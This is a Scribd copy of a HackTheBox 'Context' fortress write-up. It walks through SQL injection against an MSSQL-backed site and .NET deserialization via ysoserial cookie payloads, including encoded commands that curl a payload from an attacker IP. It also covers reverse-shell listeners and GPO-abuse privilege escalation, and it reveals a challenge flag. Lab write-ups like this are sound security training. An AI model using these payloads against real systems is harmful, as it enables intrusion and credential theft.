Scribd
Upload
253 views24 pages

Context_Fortress

The document is a detailed write-up of a challenging HackTheBox fortress, outlining the author's enumeration and exploitation techniques, including SQL injection and deserialization vulnerabilities. It describes the process of retrieving flags and user credentials, as well as the use of tools like evil-winrm and ysoserial.exe for gaining access. The author shares insights and commands used throughout the process, emphasizing the learning experience gained from tackling the fortress.

Uploaded by

fayzullayevich15
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
253 views24 pages

Context_Fortress

The document is a detailed write-up of a challenging HackTheBox fortress, outlining the author's enumeration and exploitation techniques, including SQL injection and deserialization vulnerabilities. It describes the process of retrieving flags and user credentials, as well as the use of tools like evil-winrm and ysoserial.exe for gaining access. The author shares insights and commands used throughout the process, emphasizing the learning experience gained from tackling the fortress.

Uploaded by

fayzullayevich15
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 24

HackTheBox-Context

10/05/2024

Context Fortress Write-up


Introduction
This fortress was a bit of a nightmare for me honestly i would rate
it hard and definitely not beginner friendly it involves fun
challenges and i learned a lot from it even tho it took me a while
to actually finish it the main reason for writing this is because it
helps my learning process and its always a good habit to take
notes also i will be providing links and everything you need.

● But we have SSL!?


● That shouldn't be there...
● Have we met before?
● Is it a bird? Is it a plane?
● This looks bad!
● It's not a backdoor, it's a feature
● Key to the castle

Enumeration phase
● But we have SSL!?

nmap -p- -sCV --min-rate=7000 10.13.37.12 -oN scan

5985 port is known for windows RDP which means we


Can use it later with evil-winrm

1
HackTheBox-Context
10/05/2024

Checking the scan results for further information there is a


mssql server running on port 1433 and a teignton.htb
domain revealed

2
HackTheBox-Context
10/05/2024

Moving on i used feroxbuster to find hidden directories i


found an interesting one “/owa” which is owa outlook web
service

But lets not get ahead just yet as per usual i check the
website where the first flag is in the source code of the
page https://10.13.37.12/Home/Staff

Using those creds i entered https://10.13.37.12/Admin

And went to https://10.13.37.12/Admin/Management

● That shouldn't be there...

3
HackTheBox-Context
10/05/2024

I tried bunch of XSS payloads and tools nothing really


worked so i went on to try SQLi so i tried bunch of stuff
although i didnt really user sqlmap i did it manually
These were the payloads that worked '+(select
db_name() as CurrentDatabaseName)+'
'+(select db_name())+'
And it revealed a webapp database :

And this returned the first username :


'+(select top 1 username from users order
by 1)+'

Next mission is to retrieve the password :

'+(select top 1 password from users order


by username)+'

4
HackTheBox-Context
10/05/2024

There is an admin user in the database you


can try to look for it yourself also the DB
contains a flag you can retrieve it with
this command and i will be explaining it.

'+(select password from users order by


username offset 2 rows fetch next 1 rows
only)+'

5
HackTheBox-Context
10/05/2024

1. order by username: This part of the


command orders the result set of the
subquery by the username column. It
sorts the rows in ascending order based
on the username.
2. offset 2 rows: This part of the
command skips the first 2 rows of the
sorted result set. It means that it
starts counting from the third row.
3. fetch next 1 rows only: This part of
the command specifies that only 1 row
should be returned after skipping the
offset rows.

Flag:
CONTEXT{d0_it_st0p_it_br34k_it_f1x_it}

Outlook Enum

6
HackTheBox-Context
10/05/2024

After looking around for some time i figured


that i could change mailboxes to only one other
user and found a conversation between jay and
his father

7
HackTheBox-Context
10/05/2024

So i download the Zip file and start looking for


vulnerabilties and after a while i come across
Views/_ViewStart.cshtml file what caught my eye was this

And i remembered a challenge i played a while ago it was


a pickle deserialization vulnerability so i started
researching what this file do is send Profile cookie to

8
HackTheBox-Context
10/05/2024

server and sterialize it ( sterializing means converting data


into stream of bytes this is a great and simple article that
explains it https://hazelcast.com/glossary/serialization/)

So the idea here is to get a reverse shell through Profile


cookie for that we need to use ysoserial.exe its a famous
tool for generating payloads that exploit unsafe .NET
object deserialization so we search for JavaScriptSerilizer
And we must convert it to base64 to match the how the
data is being manipulated from the script.
Move on if you want to use ysoserial.exe on linux machine
you have to install mono or wine and run any NET script
you want.

And look for JavaScriptSerializer

Now we need to craft our payload like so :

9
HackTheBox-Context
10/05/2024

Result :
ewogICAgJ19fdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhd
GEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50Y
XRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ
3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zM
WJmMzg1NmFkMzY0ZTM1JywgCiAgICAnTWV0aG9kTm
FtZSc6J1N0YXJ0JywKICAgICdPYmplY3RJbnN0YW5jZS
c6ewogICAgICAgICdfX3R5cGUnOidTeXN0ZW0uRGlhZ2
5vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uP
TQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGlj
S2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsCiAgICA
gICAgJ1N0YXJ0SW5mbyc6IHsKICAgICAgICAgICAgJ19f
dHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU
3RhcnRJbmZvLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAu
MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb
2tlbj1iNzdhNWM1NjE5MzRlMDg5JywKICAgICAgICAgICA
gJ0ZpbGVOYW1lJzonY21kJywgJ0FyZ3VtZW50cyc6Jy9jI
GNtZCAvYyBjdXJsIDEwLjEwLjE2LjU6ODAwL3Jldi5leGU
gLW8gQzpcXFByb2dyYW1EYXRhXFxyZXYuZXhlJwogIC
AgICAgIH0KICAgIH0KfQ==

But before that we need to craft our reverse shell exe

10
HackTheBox-Context
10/05/2024

Now start a http server with python on the port you


specified before and refresh page :

11
HackTheBox-Context
10/05/2024

Now we need to setup the listener on port 4444 and wait


for connection but before that we need to use
ysoserial.exe again to execute the rev.exe

The base64:
ewogICAgJ19fdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhd
GEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50Y
XRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ
3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zM
WJmMzg1NmFkMzY0ZTM1JywgCiAgICAnTWV0aG9kTm
FtZSc6J1N0YXJ0JywKICAgICdPYmplY3RJbnN0YW5jZS
c6ewogICAgICAgICdfX3R5cGUnOidTeXN0ZW0uRGlhZ2
5vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uP
TQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGlj
S2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsCiAgICA
gICAgJ1N0YXJ0SW5mbyc6IHsKICAgICAgICAgICAgJ19f
dHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU
3RhcnRJbmZvLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAu
MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb
2tlbj1iNzdhNWM1NjE5MzRlMDg5JywKICAgICAgICAgICA
gJ0ZpbGVOYW1lJzonY21kJywgJ0FyZ3VtZW50cyc6Jy9jI
GNtZCAvYyBDOlxcUHJvZ3JhbURhdGFcXHJldi5leGUnCi
AgICAgICAgfQogICAgfQp9

12
HackTheBox-Context
10/05/2024

And now inject it to the Profile cookie again after you setup
the listener

BOOM!!
Next flag is

Next go to logs/webdb and cat log_13.trc file we will be


finding karl creds

13
HackTheBox-Context
10/05/2024

Moving on i logged

Found This

Apparently Karl has some database privs so i try to log in


using impacket-mssqlclient

14
HackTheBox-Context
10/05/2024

I didnt find really worth looking in this database so i tried to


look around webapp wasnt the only servlet

So i tried to access Clients

15
HackTheBox-Context
10/05/2024

Card_details returned a massive amount of data i


exported it to a file enter this command to access data :

SELECT * FROM
[web\clients].[clients].[dbo].[card_details
];

After further search in assembly_files


Use this command to retrieve the data :

select cast (N'' as


xml).value('xs:base64Binary(sql:column("con
tent"))','varchar(max)') as data from
openquery([web\clients], 'select * from
clients.sys.assembly_files;') order by
content desc offset 1 rows;

1. Xml Value Method:


○ cast (N'' as
xml).value('xs:base64Binary(sql:colu
mn("content"))','varchar(max)') as

16
HackTheBox-Context
10/05/2024

data: This part of the command converts the


content column data, which is assumed to be in
Base64-encoded format, from XML data type to a
varchar(max) data type.
○ The cast (N'' as xml) part creates an
empty XML instance.
○ The .value() method is applied to this XML
instance. It extracts the value of the content
column, assumes it's in Base64 format
(xs:base64Binary), and converts it to a string
(varchar(max)).

Put that data in a file after you convert it from base64


After that we are gonna be needing dnspy to decompile it
although you will be needing wine for that

Search the file until you find jay creds

17
HackTheBox-Context
10/05/2024

And here where evil-winrm comes in handy

In the documents i found WindowsService.exe which


basically hosts a TCP server on port 7734 after
decompiling it in dnspy here are the results

There is loads of interesting functions like


CheckClientCommand() and CheckClientPassword
And password func

18
HackTheBox-Context
10/05/2024

19
HackTheBox-Context
10/05/2024

Anywho for us

In powershell type :
(Get-Date).ToString("yyyy-MM-dd") + "-thisisleet"
For the password

Then upload netcat to the windows machine although


before that we must upgrade the powershell to fully stable
shell otherwise we won’t be able to use really nc64.exe.
And for that i am gonna use ConPtyShell

git clone
https://github.com/antonioCoco/ConPtyShell.
git

20
HackTheBox-Context
10/05/2024

Enter the directory and compile the ConPtyShell.cs c# file


to an executable after loads of trial and error i found that i
should only compile it with NET v4.8 because
The .NET Framework 4.8 is based on .NET Standard 2.0.
Therefore you can specify the -sdk option with a value of
2.0 to target .NET Standard 2.0, which is compatible with
.NET Framework 4.8
I asked chatGPT to check the NET version on the target
machine and it gave me this command :

Get-ItemPropertyValue
'HKLM:\SOFTWARE\Microsoft\NET Framework
Setup\NDP\v4\Full' -Name Release

it returned 528049 while correlates to v4.8: 528040


That’s why when compiling it with mcs we should use this
specific command for it to work :

Upload this exe to the remote machine and type this in


your terminal

21
HackTheBox-Context
10/05/2024

Attacker Machine:
stty raw -echo; (stty size; cat) | nc -lvnp 443

Target Machine
.\ConPtyShell.exe 10.10.16.5 443

Got it now for the next step is to nc to 7734 and get a


Reverse shell session setup a new nc listener on your
attack box.

And we get a connection as andy

22
HackTheBox-Context
10/05/2024

From what i heard because honestly i didnt notice it by


myself a way to escalate priv is by group policy objects
https://www.mindpointgroup.com/blog/privilege-escalation-
via-group-policy-preferences-gpp
That article explains it but not in a very direct way anywho
lets get started

23
HackTheBox-Context
10/05/2024

Now we need SharpGPOAbuse for the next step

And that’s it for the last flag now that we have given
jay.teignton localadmin privs we use evil-winrm once more

And that’s it for this fortress was really fun to play hope
you enjoy it as well

24

You might also like